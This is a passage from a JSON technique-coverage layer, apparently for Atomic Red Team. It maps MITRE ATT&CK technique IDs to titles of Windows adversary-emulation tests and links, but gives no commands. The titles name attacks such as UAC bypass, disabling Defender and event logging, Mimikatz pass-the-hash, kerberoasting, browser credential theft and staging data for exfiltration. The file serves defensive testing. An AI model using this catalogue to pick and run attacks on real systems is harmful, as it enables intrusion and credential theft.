Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View 